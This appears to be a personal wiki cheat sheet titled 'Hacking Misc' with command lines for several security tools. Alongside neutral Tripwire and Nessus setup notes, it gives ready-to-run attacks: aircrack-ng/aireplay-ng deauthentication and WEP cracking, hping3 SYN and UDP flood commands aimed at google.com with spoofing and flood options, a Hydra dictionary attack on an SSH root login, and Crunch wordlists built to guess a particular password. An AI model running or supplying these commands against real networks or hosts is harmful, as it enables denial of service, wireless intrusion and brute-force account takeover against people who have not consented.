Hacking Misc
Aircrack-NG
airmon-ng stop mon0 airmon-ng start wlan0 airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0 aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0 aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0 aircrack-ng output*.cap
ifconfig wlan0 down iwconfig wlan0 essid g0tmi1k iwconfig wlan0 key 59EF19C76A ifconfig wlan0 up dhclient wlan0
Tripwire
apt-get install tripwire chmod 0600 tw.cfg tw.pol
edit the default policy, check out /etc/tripwire/twpol.txt, comment out any files or folders you do not want to be checked. Once done:
twadmin --create-polfile --cfgfile ./tw.cfg --site-keyfile ./site.key ./twpol.txt
Initialising the database:
tripwire --init --cfgfile /etc/tripwire/tw.cfg --polfile /etc/tripwire/tw.pol --site-keyfile /etc/tripwire/site.key --local-keyfile /etc/tripwire/aman-Inspiron-1440-local.key
System Checks:
tripwire --check
Updating the policy:
tripwire --update-policy --cfgfile ./tw.cfg --polfile ./tw.pol --site-keyfile ./site.key --local-keyfile ./aman-Inspiron-1440-local.key ./twpol.txt
Regular Updates:
tripwire --update -Z low
If you have recently run a check and want the update to proceed using your most recent report file, then use the -r option and provide the report filename that you want the update to use.
tripwire --update -Z low --twrfile host-yyyymmdd-tttttt.twr
Nessus
Installation:
sudo /opt/nessus/bin/nessus-fetch --register 7421-23D5-E7CF-6757-9020 sudo /opt/nessus/sbin/nessus-adduser sudo /opt/nessus/sbin/nessus-service -q -D sudo /etc/init.d/nessusd start sudo /etc/init.d/nessusd stop sudo /opt/nessus/sbin/nessus-update-plugins sudo /opt/nessus/bin/nessus-fetch --check
Disable and remove Startup scripts:
sudo update-rc.d -f nessusd disable sudo update-rc.d -f nessusd remove
Usage:
https://localhost:8834/ Add policy:"home" Uncheck "Denial of Service" in "Plugins" Preferences > Donot check fragile devices > Check "Scan Network Printer"
Uninstall:
rm -rf /opt/nessus
Upgrade:
/etc/init.d/nessusd stop dpkg -i Nessus-4.x.x-ubuntu910_i386.deb /etc/init.d/nessusd start
Hping3
SYN flood to google.com's port 80
hping3 google.com -p 80 -i u30000 -S
UDP flood google.com:
hping3 google.com -p 80 -i u30000 --udp
hping3 10.66.10.42 -p 80 -i u10 -S -d 100000 --flood -y
-a 10.66.10.198 spoofing -i u1000 100 packets for second -i u10000 10 packets for second -d data size --flood Sent packets as fast as possible --rand-dest random destionation address mode --rand-source random source address mode -y --dontfrag Set don't fragment IP flag
Hydra
Using Dictionary attack:
hydra -l root -P ~/dictionary/test.txt ssh://10.107.88.66 -t 1 -f -vV -o found.txt
Crunch
The basic syntax for crunch looks like this:
crunch <min> max<max> <characterset> -t <pattern> -o <output filename>
Now, let’s go over what’s included in the syntax above.
min= The minimum password length. max= The maximum password length. characterset= The character set to be used in generating the passwords. -t <pattern>= The specified pattern of the generated passwords. -o <outputfile>= This is the file you want your wordlist written to.
To generate pasword list with birth date 0728 (July 28):
crunch 10 10 -t @@@@@@0728 -o birthdaywordlist.lst
Creating a list for password like: "Citrix.aman#"
crunch 12 12 Citrx.#@aman -t Citrix@@@@@@ -o xensrvpwd.txt
This would be even better choice as we will have a smaller file
crunch 12 12 .#@%! -t Citrix@aman@ -o xensrvpwd.txt
Using Rainbow Charset:
cat /usr/share/rainbowcrack/charset.txt crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o alphawordlist.lst
- References
{{#widget:DISQUS
|id=networkm
|uniqid=Hacking Misc
|url=https://aman.awiki.org/wiki/Hacking_Misc
}}